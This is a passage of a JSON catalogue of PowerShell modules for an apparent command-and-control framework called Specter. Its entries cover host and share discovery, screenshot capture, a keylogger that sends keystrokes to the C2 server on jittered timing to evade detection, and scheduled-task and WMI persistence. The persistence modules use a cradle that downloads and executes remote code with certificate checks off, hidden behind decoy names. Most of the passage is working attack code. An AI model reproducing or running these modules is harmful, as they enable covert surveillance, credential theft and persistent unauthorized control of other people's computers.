0\r\n\r\nComputerName : localhost\r\nUserName     : helpdesk\r\nEnabled      : True\r\nRid          : 1001\r\nUserType     : Administrator\r\nComment      : \r\nPwdLastSet   : 3/10/2022 11:25:03 PM\r\nLastLogon    : 10/12/2022 11:45:47 AM\r\nNumLogins    : 9\r\n\r\nComputerName : localhost\r\nUserName     : jason.bourne\r\nEnabled      : True\r\nRid          : 1004\r\nUserType     : Guest\r\nComment      : \r\nPwdLastSet   : 7/7/2022 12:58:23 PM\r\nLastLogon    : 1/1/1970 12:00:00 AM\r\nNumLogins    : 0\r\n\r\nComputerName : localhost\r\nUserName     : WDAGUtilityAccount\r\nEnabled      : False\r\nRid          : 504\r\nUserType     : Guest\r\nComment      : A user account managed and used by the system for Windows Defender Application Guard scenarios.\r\nPwdLastSet   : 3/10/2022 11:19:34 PM\r\nLastLogon    : 1/1/1970 12:00:00 AM\r\nNumLogins    : 0\r\n```",
    "scriptBlock": "load recon;\r\n\r\nGet-LocalUsers",
    "version": 1,
    "isPremium": true,
    "labels": [
      "account-discovery",
      "api",
      "discovery",
      "host-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "0b66c621d67e4824a575eac80825950a",
    "name": "Get SMB Shares",
    "description": "Lists properties of mapped shares on the specified systems.",
    "documentation": "# Overview\r\n\r\nDiscovers shares by querying the target computers using WMI.\r\n\r\n# Example Output\r\n\r\n```\r\nDESKTOP-LMCH70V Name   Path       Status Description\r\n--------------- ----   ----       ------ -----------\r\n                ADMIN$ C:\\Windows OK     Remote Admin\r\n                C$     C:\\        OK     Default share\r\n                IPC$              OK     Remote IPC\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"A comma-separated list of domain names, IPs, or IP ranges to query for SMB shares.\")]\r\n    [string[]]$Targets = @('10.0.0.14')\r\n)\r\n\r\nforeach($target in $Targets) {\r\n\tGet-WmiObject WIN32_SHARE -ComputerName $target | Select DESKTOP-LMCH70V,Name,Path,Status,Description\r\n}",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "discovery",
      "network-discovery",
      "network-share-discovery",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "c44b58407ba64639a1277aa9cf50427b",
    "name": "Get USB History",
    "description": "List information about USB devices that have been plugged into the system.",
    "documentation": "",
    "scriptBlock": "$Key = \"Registry::HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBStor\\\"\r\n\r\n$SubKeys = Get-ChildItem $Key -EA 0\r\n        \r\n$Devices = foreach ($device in $SubKeys){\r\n    $keyObject = Get-Item (\"Registry::\" + $device.Name + \"\\*\")\r\n            \r\n    $Properties = $keyObject.Property\r\n        \r\n    foreach ($Property in $Properties){\r\n        $device | Add-Member -MemberType NoteProperty -Name $Property -Value $keyObject.GetValue($Property)\r\n    }\r\n        \r\n    $device | Add-Member -MemberType NoteProperty -Name \"WindowsID\" -Value ($device | Get-ChildItem).Name.split(\"\\\")[-1]\r\n        \r\n    $device\r\n}\r\n        \r\n$ResultsArray = foreach ($Result in $Devices) {\r\n    $Result.CompatibleIDs = ($device.CompatibleIDs -join \", \")\r\n    $Result.HardwareID = ($device.HardwareID -join \", \")\r\n    $Result\r\n}\r\n        \r\n$ResultsArray | Select-Object Name, FriendlyName, WindowsID, Address, Capabilities, ClassGUID, CompatibleIDs, ConfigFlags, ContainerID, DeviceDesc, Driver, HardwareID, Mfg, Service",
    "version": 1,
    "isPremium": true,
    "labels": [],
    "enabled": true
  },
  {
    "identifier": "277fe29b66b34eaf8839d45832c53ac5",
    "name": "Get Recycle Bin Contents",
    "description": "Lists files from all of the items in the Recycle Bin.",
    "documentation": "# Overview\r\n\r\nLists files from all of the items in the Recycle Bin.\r\n\r\n**WARNING:** This may list a lot of files. There were 17K results on my dev machine.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nLinkType          :\r\nName              : $I5PSX2Z.cs\r\nLength            : 286\r\nDirectory         : C:\\$Recycle.Bin\\S-1-5-21-3175321519-4186628844-3469316858-1001\r\nIsReadOnly        : False\r\nFullName          : C:\\$Recycle.Bin\\S-1-5-21-3175321519-4186628844-3469316858-1001\\$I5PSX2Z.cs\r\nCreationTimeUtc   : 12/15/2022 11:23:00 PM\r\nLastAccessTimeUtc : 12/15/2022 11:23:00 PM\r\nLastWriteTimeUtc  : 12/15/2022 11:23:00 PM\r\n```",
    "scriptBlock": "$files = Get-ChildItem (\"{0}\\`$Recycle.Bin\" -f $env:SystemDrive) -Force -Recurse\r\n$files | Select-Object LinkType, Name, Length, Directory, IsReadOnly, FullName, CreationTimeUtc, LastAccessTimeUtc, LastWriteTimeUtc, PSIsContainer, Mode",
    "version": 1,
    "isPremium": true,
    "labels": [
      "collection",
      "passive",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "23f93e700a34437997b136a020ab61e0",
    "name": "Get Screenshot",
    "description": "Captures a screenshot of the desktop or active window.",
    "documentation": "# Overview\r\n\r\nThis cmdlet leverages GetDesktopWindow or GetForegroundWindow to get a handle to the target window. It the  uses the ImageCodecInfo to encode the file as .jpg using the specified compression level. It then exfiltrates the file over the C2 channel where it is stored in the Artifacts collection.\r\n\r\n# Inputs\r\n\r\n**Type:** The target window to capture.\r\n\r\n**CompressionLevel:** The compression level on a scal from 1 to 100 where 100 is the least compression.\r\n\r\n# Example Output\r\n\r\n```\r\nFilename                             Size\r\n--------                             ----\r\nscreenshot-2023-12-09-12-59-41.jpg 191202\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The target window to capture.\")]\r\n    [ValidateSet(\"Fullscreen\", \"Active Window\")]\r\n    [string]$Type = \"Fullscreen\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The compression level on a scal from 1 to 100 where 100 is the least compression.\")]\r\n    [int]$CompressionLevel = 90\r\n)\r\n\r\nload common;\r\n\r\nif($CompressionLevel -gt 100) {\r\n    $CompressionLevel = 100;\r\n} elseif($CompressionLevel -lt 1) {\r\n    $CompressionLevel = 1;\r\n}\r\n\r\nif($Type -eq \"Active Window\") {\r\n    screenshot -CompressionLevel $CompressionLevel -ActiveWindow | exfil;\r\n} else {\r\n    screenshot -CompressionLevel $CompressionLevel -Fullscreen | exfil;\r\n}",
    "version": 3,
    "isPremium": true,
    "labels": [
      "api",
      "collection",
      "screen-capture",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "97d6b0d64b4548b3b3e597786e97823c",
    "name": "User Persistence with Scheduled Task Commandline and PowerShell Cradle",
    "description": "Installs persistence by creating a scheduled task to run a PowerShell cradle on user logon.",
    "documentation": "# Overview\r\n\r\nInstalls persistence by creating a scheduled task to run a PowerShell cradle on logon. The cradle is stored in a user environment variable to mitigate detection. The scheduled task is configured to execute the contents of the specified environment variable as the current user.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```json\r\n{\r\n  \"Persistence\": {\r\n    \"Id\": \"2ba6265671ee44ba81f1ec40304bb17c\",\r\n    \"Method\": \"Scheduled Task\",\r\n    \"Trigger\": \"OnLogon\",\r\n    \"Build\": \"92cbf1b0f92642859f28f258226cc1f3\",\r\n    \"Profile\": \"User\",\r\n    \"Event\": \"Create\",\r\n    \"Success\": true,\r\n    \"UninstallScript\": \"$output = (schtasks /DELETE /TN 'CacheTask' /F) -join ([System.Environment]::NewLine);\\r\\n$success = $output -like '*success*';\\r\\ntry {\\r\\n\\t[Environment]::SetEnvironmentVariable('GPO_AUX', $null, 'Machine');\\r\\n} catch {\\r\\n\\t$success = $false;\\r\\n\\tthrow;\\r\\n}\\r\\n\\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"2ba6265671ee44ba81f1ec40304bb17c\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"Scheduled Task\\\";\\r\\n\\t    Profile = \\\"User\\\";\\r\\n\\t    Trigger = \\\"OnLogon\\\";\\r\\n\\t}\\r\\n}\",\r\n    \"TaskName\": \"CacheTask\",\r\n    \"EnvironmentVariableName\": \"GPO_AUX\"\r\n  }\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the scheduled task.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$TaskName = 'CacheTask',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of an environment variable that will store the PowerShell cradle.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$EnvironmentVariableName = 'GPO_AUX',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The event that will activate the PowerShell cradle.\")]\r\n    [ValidateSet('OnLogon')]\r\n    [string]$Trigger = \"OnLogon\",\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\ntry {\r\n    #Get the URLs for the cradle generator\r\n\t$urls = (payload -Build $Build -Kind 'ps_url' | % { \"'$_'\" }) -Join \", \";\r\n\t$task = \"[Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}; `$urls = @($urls); foreach(`$url in `$urls) { try { `$a = (New-Object Net.WebClient).DownloadString(`$url); iex `$a; } catch { } }\";\r\n\t[Environment]::SetEnvironmentVariable($EnvironmentVariableName, $task, \"User\")\r\n\t$output = (schtasks /CREATE /SC $Trigger /TN $TaskName /TR \"powershell.exe -WindowStyle hidden -NonInt -ep bypass -nop -c \\`\"iex ([Environment]::GetEnvironmentVariable(\\\\\\`\"$EnvironmentVariableName\\\\\\`\", \\\\\\`\"User\\\\\\`\"))\\`\"\" /F) -join ([Environment]::NewLine);\r\n\t$success = $output -like '*success*';\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"User\";\r\n\t    Trigger = $Trigger;\r\n\t    TaskName = $TaskName;\r\n\t    EnvironmentVariableName = $EnvironmentVariableName;\r\n\t    Build = $Build;\r\n\t    UninstallScript = @\"\r\n`$output = (schtasks /DELETE /TN '$TaskName' /F) -join ([System.Environment]::NewLine);\r\n`$success = `$output -like '*success*';\r\ntry {\r\n\t[Environment]::SetEnvironmentVariable('$EnvironmentVariableName', `$null, 'Machine');\r\n} catch {\r\n\t`$success = `$false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"Scheduled Task\";\r\n\t    Profile = \"User\";\r\n\t    Trigger = \"$Trigger\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 7,
    "isPremium": true,
    "labels": [
      "command-and-scripting-interpreter",
      "command-line",
      "event-triggered-execution",
      "persistence",
      "powershell",
      "scheduled-task",
      "windows",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "e67933e81c3f4c0eab8392dced8a0e1a",
    "name": "System Persistence with WMI Event Subscription and PowerShell Cradle",
    "description": "Establishes System level persistence by registering a WMI Event Consumer that triggers when the startup time exceeds 1387 seconds and then runs a PowerShell cradle.",
    "documentation": "# Overview\r\n\r\nThis script leverages WMI to subscribe to an event and execute Specter cradle when that event occurs, providing persistence on a system. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus will result in elevated SYSTEM privileges. There are four different triggers that can be used for persistence:\r\n\r\n- **OnStartup:** Executes between 4 and 5 minutes after system startup.\r\n- **OnLogon:** Executes on any user logon.\r\n- **OnInterval:** Executes on an operator specified interval (e.g. every X seconds).\r\n- **OnTime:** Executes at an operator local time every day.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Pre-Requisites\r\n\r\n- High Integrity process.\r\n\r\n# Example Output\r\n\r\n```json\r\n{\r\n  \"Persistence\": {\r\n    \"Id\": \"babc72a228f94b1fb98d9c232d078e9b\",\r\n    \"Method\": \"WMI Event Subscription\",\r\n    \"Trigger\": \"OnInterval\",\r\n    \"Profile\": \"System\",\r\n    \"Event\": \"Create\",\r\n    \"Success\": true,\r\n    \"UninstallScript\": \"try {\\r\\n\\t$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \\\"Name = 'SCM Health Check Consumer'\\\"\\r\\n\\t$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \\\"Name = 'SCM Health Check Filter'\\\"\\r\\n\\t$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \\\"REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding\\\"\\r\\n\\t$TimerIdToRemove = Get-WmiObject -Class __IntervalTimerInstruction -Filter \\\"TimerId='44631667'\\\"\\r\\n\\t\\r\\n\\t$FilterConsumerBindingToCleanup | Remove-WmiObject\\r\\n\\t$EventConsumerToCleanup | Remove-WmiObject\\r\\n\\t$EventFilterToCleanup | Remove-WmiObject\\r\\n\\tif($TimerIdToRemove -ne $null) { $TimerIdToRemove | Remove-WmiObject }\\r\\n\\t$success = $true\\r\\n} catch {\\r\\n\\t$success = $false\\r\\n\\tthrow\\r\\n}\\r\\n\\t    \\r\\nNew-Object PSObject -Property @{\\r\\n\\tPersistence = New-Object PSObject -Property @{\\r\\n\\t\\tId = \\\"babc72a228f94b1fb98d9c232d078e9b\\\";\\r\\n\\t\\tEvent = \\\"Delete\\\";\\r\\n\\t\\tSuccess = $success;\\r\\n\\t    Method = \\\"WMI Event Subscription\\\";\\r\\n\\t    Profile = \\\"System\\\";\\r\\n\\t    Trigger = \\\"OnInterval\\\";\\r\\n\\t}\\r\\n}\",\r\n    \"ConsumerName\": \"SCM Health Check Consumer\",\r\n    \"FilterName\": \"SCM Health Check Filter\"\r\n  }\r\n}\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the WMI event filter.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$FilterName = 'SCM Health Check Filter',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The name of the WMI event consumer.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [string]$ConsumerName = 'SCM Health Check Consumer',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The type of event that will run a new PowerShell cradle.\")]\r\n    [ValidateSet('OnStartup', 'OnLogon', 'OnInterval', 'OnTime')]\r\n    [string]$Trigger = 'OnStartup',\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"The number of seconds between executions of the PowerShell cradle if using the OnInterval trigger.\")]\r\n    [int]$IntervalPeriod = 3600,\r\n\r\n    [Parameter(Mandatory = $false, HelpMessage = \"A specific time to execute the PowerShell cradle if using the OnTime trigger in hh:mm:ss format.\")]\r\n    [ValidateNotNull()]\r\n    [TimeSpan]$ExecutionTime = '10:00:00',\r\n\r\n    [Parameter(Mandatory = $true, HelpMessage = \"The Specter build identifier.\")]\r\n    [ValidateNotNullOrEmpty()]\r\n    [Build]\r\n    [string]$Build\r\n)\r\n\r\ntry {\r\n\t#Get the URLs for the cradle generator\r\n\t$command = payload -Build $Build -Kind 'ps_command';\r\n\t\r\n\t#Build the filter query\r\n\t$TimerId = Get-Random;\r\n\tSwitch ($Trigger) {\r\n\t    'OnStartup' {\r\n\t        $query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"\r\n\t    }\r\n\t    \r\n\t    'OnLogon' {\r\n\t        $query = \"SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser'\"\r\n\t    }\r\n\t        \r\n\t    'OnInterval' {\r\n\t        Set-WmiInstance -class '__IntervalTimerInstruction' -Arguments @{ IntervalBetweenEvents = ($IntervalPeriod * 1000); TimerId = $TimerId } | Out-Null\r\n\t        $query = \"Select * from __TimerEvent where TimerId = '$TimerId'\"\r\n\t    }\r\n\t        \r\n\t    'OnTime' {\r\n\t        $query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ExecutionTime.Hour.ToString()) AND TargetInstance.Minute = $($ExecutionTime.Minute.ToString()) GROUP WITHIN 60\"\r\n\t    }  \r\n\t}\r\n\t\r\n\t#Register the filter\r\n\t$FilterArgs = @{\r\n\t    Name=$FilterName;\r\n\t    EventNameSpace='root\\CimV2';\r\n\t    QueryLanguage=\"WQL\";\r\n\t    Query=$query;\r\n\t};\r\n\r\n\t#Register the filter\r\n\t$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $FilterArgs\r\n\t\r\n\t#Register a commandline consumer\r\n\t$ConsumerArgs = @{\r\n\t    name=$ConsumerName;\r\n\t    CommandLineTemplate=$command;\r\n\t}\r\n\t\r\n\t#Register the consumer\r\n\t$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs\r\n\t\r\n\t#Bind the filter to the consumer\r\n\t$FilterToConsumerArgs = @{\r\n\t    Filter = $Filter;\r\n\t    Consumer = $Consumer;\r\n\t}\r\n\t#This binds the consumer to the filter\r\n\t$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs\r\n\t\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\n#Generate persistence ID\r\n$id = [Guid]::NewGuid().ToString().Replace(\"-\", \"\");\r\n\r\n#Log output\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = $id;\r\n\t\tEvent = \"Create\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"WMI Event Subscription\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = $Trigger;\r\n\t    FilterName = $FilterName;\r\n\t    ConsumerName = $ConsumerName;\r\n\t    Build = $Build;\r\n\t    UninstallScript = @\"\r\ntry {\r\n\t`$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter \"Name = '$ConsumerName'\"\r\n\t`$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter \"Name = '$FilterName'\"\r\n\t`$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query \"REFERENCES OF {CommandLineEventConsumer.Name='$ConsumerName'} WHERE ResultClass = __FilterToConsumerBinding\"\r\n\t`$TimerIdToRemove = Get-WmiObject -Class __IntervalTimerInstruction -Filter \"TimerId='$TimerId'\"\r\n\t\r\n\t`$FilterConsumerBindingToCleanup | Remove-WmiObject\r\n\t`$EventConsumerToCleanup | Remove-WmiObject\r\n\t`$EventFilterToCleanup | Remove-WmiObject\r\n\tif(`$TimerIdToRemove -ne `$null) { `$TimerIdToRemove | Remove-WmiObject }\r\n\t`$success = `$true\r\n} catch {\r\n\t`$success = `$false\r\n\tthrow\r\n}\r\n\t    \r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"$id\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = `$success;\r\n\t    Method = \"WMI Event Subscription\";\r\n\t    Profile = \"System\";\r\n\t    Trigger = \"$Trigger\";\r\n\t}\r\n}\r\n\"@;\r\n\t}\r\n}",
    "version": 11,
    "isPremium": true,
    "labels": [
      "api",
      "event-triggered-execution",
      "persistence",
      "windows",
      "windows-management-instrumentation-event-subscription"
    ],
    "enabled": true
  },
  {
    "identifier": "fbcd53ef2a874e43bc7bd6b1b5cc2cf2",
    "name": "Get Captured Keys",
    "description": "Gets the captured keystrokes and clears the internal buffer.",
    "documentation": "# Overview\r\n\r\nGets the captured keystrokes and exfiltrates them over the C2 channel as a string. The internal buffer containing captured keys will be cleared.\r\n\r\n# Dependencies\r\n\r\n* Credentials",
    "scriptBlock": "load credentials;\r\n\r\nGet-CapturedKeys;",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "input-capture",
      "keylogging",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "98cc07a185964a7b8d6493a78dfee3eb",
    "name": "Keylogger Background Exfil",
    "description": "Monitors keystrokes and periodically exfiltrates them back to the C2 server.",
    "documentation": "# Overview\r\n\r\nThis script monitors keystrokes and then periodically exfiltrates them back to the C2 server. The timing is defined by an interval and jitter to make the exfil less detectable. The timing can be changed by modifying the interval and jitter variables at the top of the script.\r\n\r\n**WARNING:** This script is designed to be run in the background as it would block the foreground until it completes.\r\n\r\n# Example Output\r\n\r\nThe expected output is a set of exfiltrated keylogger files located in the artifacts tab.\r\n\r\n```\r\nFilename                          Size\r\n--------                          ----\r\nkeystrokes2023-01-29-11-29-02.txt  220\r\n```\r\n\r\nThe conents of the exfiltrated keystrokes.\r\n\r\n```\r\nwww.xkcd.com[Enter][Ctrl]a[Shift]i[Space]wonder[Space]if[Space]it[Space]will[Space]capture[Space]this[Enter][Enter]buscoman[Enter][Enter]1qaz[Shift]1qazkey[Back][Back][Back][Ctrl]a[Shift]get-[Shift]captured[Shift]keys[Shift]get-[Shift]captured[Shift]keys\r\n```",
    "scriptBlock": "param(\r\n    [Parameter(Mandatory = $False, HelpMessage = \"The length of time to capture keystrokes.\")]\r\n    [TimeSpan]$Duration = '24:00:00',\r\n\r\n    [Parameter(Mandatory = $False, HelpMessage = \"The minimum time until the callback window in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Interval = '01:00:00',\r\n\r\n    [Parameter(Mandatory = $False, HelpMessage = \"The length of the callback window in dd:hh:mm:ss or hh:mm:ss format.\")]\r\n    [TimeSpan]$Window = '00:30:00'\r\n)\r\n\r\nload credentials;\r\n\r\n#Necessary variables\r\n$random = New-Object System.Random;\r\n$watch = New-Object System.Diagnostics.Stopwatch;\r\n$watch.Start();\r\n\r\n#Start the key logger\r\ntry {\r\n\tStart-KeyLogger\r\n} catch { }\r\n\r\n#Enter loop\r\nwhile($watch.ElapsedMilliseconds -lt $Duration.TotalMilliseconds) {\r\n    #Generate a sleep interval\r\n    $sleep = $random.Next($Interval.TotalMilliseconds, $Interval.TotalMilliseconds + $Window.TotalMilliseconds);\r\n\r\n    #Sleep until the next exfil time\r\n    Start-Sleep -Milliseconds $sleep;\r\n\r\n    #Collect keystrokes\r\n    $keystrokes = Get-CapturedKeys\r\n\r\n    #Exfiltrate to the C2 server\r\n    $keystrokes | exfil -Name (\"keystrokes\" + [DateTime]::UtcNow.ToString(\"yyyy-MM-dd-hh-mm-ss\") + \".txt\")\r\n    Clear-CapturedKeys\r\n}\r\n\r\nStop-KeyLogger",
    "version": 2,
    "isPremium": true,
    "labels": [
      "api",
      "input-capture",
      "keylogging",
      "passive",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "c9d714e83137443d9068300439669c0c",
    "name": "Get All Open Connections via Commandline",
    "description": "This script retrieves all open connections using netstat.",
    "documentation": "# Overview\r\n\r\nThis script runs netstat with the -ano options to list all currently open connections.\r\n\r\n# Dependencies\r\n\r\n- None\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```\r\nActive Connections\r\n\r\n  Proto  Local Address          Foreign Address        State           PID\r\n  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       996\r\n  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       9008\r\n  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4\r\n  TCP    0.0.0.0:1337           0.0.0.0:0              LISTENING       9008\r\n  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1108\r\n  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5596\r\n  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       12440\r\n  TCP    0.0.0.0:17500          0.0.0.0:0              LISTENING       11348\r\n  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       756\r\n  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       588\r\n  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1328\r\n  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1292\r\n  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2372\r\n  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       2964\r\n  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       712\r\n  TCP    127.0.0.1:843          0.0.0.0:0              LISTENING       11348\r\n  TCP    127.0.0.1:1337         127.0.0.1:51351        ESTABLISHED     9008\r\n  TCP    127.0.0.1:1337         127.0.0.1:64949        ESTABLISHED     9008\r\n  TCP    127.0.0.1:17600        0.0.0.0:0              LISTENING       11348\r\n  TCP    127.0.0.1:51351        127.0.0.1:1337         ESTABLISHED     11592\r\n  TCP    127.0.0.1:52818        0.0.0.0:0              LISTENING       8220\r\n  TCP    127.0.0.1:52818        127.0.0.1:52819        ESTABLISHED     8220\r\n  TCP    127.0.0.1:52819        127.0.0.1:52818        ESTABLISHED     9000\r\n  TCP    127.0.0.1:54123        127.0.0.1:54124        ESTABLISHED     1028\r\n  TCP    127.0.0.1:54124        127.0.0.1:54123        ESTABLISHED     1028\r\n  TCP    127.0.0.1:54125        127.0.0.1:54126        ESTABLISHED     14488\r\n  TCP    127.0.0.1:54126        127.0.0.1:54125        ESTABLISHED     14488\r\n  TCP    127.0.0.1:58014        127.0.0.1:58015        ESTABLISHED     11348\r\n  TCP    127.0.0.1:58015        127.0.0.1:58014        ESTABLISHED     11348\r\n  TCP    127.0.0.1:58016        127.0.0.1:58017        ESTABLISHED     11348\r\n  TCP    127.0.0.1:58017        127.0.0.1:58016        ESTABLISHED     11348\r\n  TCP    127.0.0.1:60460        127.0.0.1:1337         TIME_WAIT       0\r\n  TCP    127.0.0.1:64821        0.0.0.0:0              LISTENING       11652\r\n  TCP    127.0.0.1:64821        127.0.0.1:64836        ESTABLISHED     11652\r\n```",
    "scriptBlock": "netstat -ano",
    "version": 1,
    "isPremium": true,
    "labels": [
      "command-line",
      "discovery",
      "host-discovery",
      "windows-command-shell"
    ],
    "enabled": true
  },
  {
    "identifier": "acb5b5f5b4ca44adb6a8d2227570dd00",
    "name": "Get Host File Entries",
    "description": "Gets the IP, domain name, and comments for each host entry.",
    "documentation": "# Overview\r\n\r\nUses regular expressions to parse out information about each host entry. This may give some insight to various system names in the target environment.\r\n\r\n# Example Output\r\n\r\n```\r\nIP           HostName       Comment\r\n--           --------       -------\r\n102.54.94.97 rhino.acme.com\r\n```",
    "scriptBlock": "$Hosts = Join-Path -Path $($env:windir) -ChildPath \"system32\\drivers\\etc\\hosts\"\r\n\r\n[regex]$nonwhitespace = \"\\S\"\r\n\r\n$HostsArray = Get-Content $Hosts | Where-Object { (($nonwhitespace.Match($_)).value -ne \"#\") -and ($_ -notmatch \"^\\s+$\") -and ($_.Length -gt 0) } # exlcude full-line comments and blank lines\r\n\r\n$ResultsArray = foreach($Entry in $HostsArray) {\r\n    $Entry -match \"(?<IP>\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\\s+(?<HOSTNAME>\\S+)\" | Out-Null\r\n\r\n    $IP = $matches.IP\r\n    $HostName = $matches.HostName\r\n\r\n    if ($Entry.contains(\"#\")) {\r\n        $Comment = $Entry.substring($Entry.indexof(\"#\")+1)\r\n    }\r\n\r\n    New-Object psobject -Property @{\r\n        IP = $IP\r\n        HostName = $HostName\r\n        Comment = $Comment \r\n    }\r\n}\r\n\r\n$ResultsArray | Select-Object IP, HostName, Comment",
    "version": 1,
    "isPremium": true,
    "labels": [
      "passive",
      "recon",
      "windows"
    ],
    "enabled": true
  },
  {
    "identifier": "009f1a7444d44f849f0d325ca362662a",
    "name": "Get Interfaces via API",
    "description": "Displays information about the local network interfaces including: name, description, IPs, DNS servers, and ARP entries.",
    "documentation": "# Overview\r\n\r\nLeverages APIs to gather the following information about each interface:\r\n\r\n- Name\r\n- Description\r\n- Status (e.g. Up, Down)\r\n- Type (e.g. Ethernet, Loopback)\r\n- IPs\r\n- DNS servers\r\n- WINS servers\r\n- ARP entries.\r\n\r\n# Dependencies\r\n\r\n- recon\r\n\r\n# Operating Systems\r\n\r\n- Windows\r\n\r\n# Example Output\r\n\r\n```json\r\n[\r\n  {\r\n    \"InterfaceIndex\": 1,\r\n    \"InterfaceName\": \"Loopback Pseudo-Interface 1\",\r\n    \"InterfaceDescription\": \"Software Loopback Interface 1\",\r\n    \"Status\": \"Up\",\r\n    \"InterfaceType\": \"Loopback\",\r\n    \"InterfaceIPs\": [\r\n      {\r\n        \"IP\": \"::1\",\r\n        \"Netmask\": \"0.0.0.0\"\r\n      },\r\n      {\r\n        \"IP\": \"127.0.0.1\",\r\n        \"Netmask\": \"255.0.0.0\"\r\n      }\r\n    ],\r\n    \"DnsServers\": [\r\n      \"fec0:0:0:ffff::1%1\",\r\n      \"fec0:0:0:ffff::2%1\",\r\n 